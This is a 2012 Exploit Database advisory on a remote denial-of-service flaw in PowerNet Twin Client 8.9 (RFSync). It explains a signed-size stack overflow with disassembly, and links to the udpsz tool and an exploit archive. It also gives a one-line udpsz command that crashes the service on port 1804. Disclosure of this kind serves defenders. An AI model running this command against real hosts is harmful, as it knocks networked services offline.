PowerNet Twin Client 8.9 – ‘RFSync 1.0.0.1’ Crash (PoC)

• Exploit Database
• 19 阅读

• 作者： Luigi Auriemma
  日期： 2012-06-29
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19456/

• #######################################################################
  
   Luigi Auriemma
  
  Application:PowerNet Twin Client
  http://www.honeywellaidc.com/en-US/Pages/Product.aspx?category=Software&cat=HSM&pid=PowerNet%20Twin%20Client
  Versions: <= 8.9 (RFSync 1.0.0.1)
  Platforms:Windows
  Bug:unexploitable stack overflow
  Exploitation: remote
  Date: 29 Jun 2012
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bug
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's website:
  "PowerNet Twin Client v8.9 PowerNet Twin Client is a serverless,
  terminal based software used in 2.4 GHz networks."
  
  
  #######################################################################
  
  ======
  2) Bug
  ======
  
  
  The software uses the function 00403cb0 to read 100 bytes from the
  incoming connection and uses a signed 8bit value provided by the
  client to copy this data in a stack buffer:
  
  00403DCB|. 0FBE4424 29 MOVSX EAX,BYTE PTR SS:[ESP+29] ; 8bit size with 8->32bit
  00403DD0|. 8B8C24 38020000 MOV ECX,DWORD PTR SS:[ESP+238] ; integer expansion bug
  00403DD7|. 83C4 08 ADD ESP,8
  00403DDA|. 48DEC EAX; integer overflow
  00403DDB|. 85C9TEST ECX,ECX
  00403DDD|. 74 02 JE SHORT RFSync.00403DE1
  00403DDF|. 8901MOV DWORD PTR DS:[ECX],EAX
  00403DE1|> 8B9424 2C020000 MOV EDX,DWORD PTR SS:[ESP+22C]
  00403DE8|. 85D2TEST EDX,EDX
  00403DEA|. 74 29 JE SHORT RFSync.00403E15
  00403DEC|. 8BC8MOV ECX,EAX
  00403DEE|. 8BD9MOV EBX,ECX
  00403DF0|. C1E9 02 SHR ECX,2
  00403DF3|. 8BFAMOV EDI,EDX
  00403DF5|. 8D7424 23 LEA ESI,DWORD PTR SS:[ESP+23]; stack overflow
  00403DF9|. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
  
  So the byte 0x80 will become 0xffffff80 and so on.
  
  Unfortunately this vulnerabily cannot be exploited to execute code
  because there is no way to control the data located after the packet
  that has a fixed size of 100 bytes: the result is just a Denial of
  Service.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip
  
  
  udpsz -T -b 0x41 -C "11 00" SERVER 1804 100
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################